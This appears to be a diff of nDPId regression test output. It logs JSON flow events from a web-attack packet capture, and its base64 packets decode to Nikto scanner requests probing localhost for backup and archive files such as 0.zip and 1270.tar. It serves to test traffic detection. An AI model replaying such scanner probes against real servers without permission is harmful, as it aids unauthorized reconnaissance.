-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
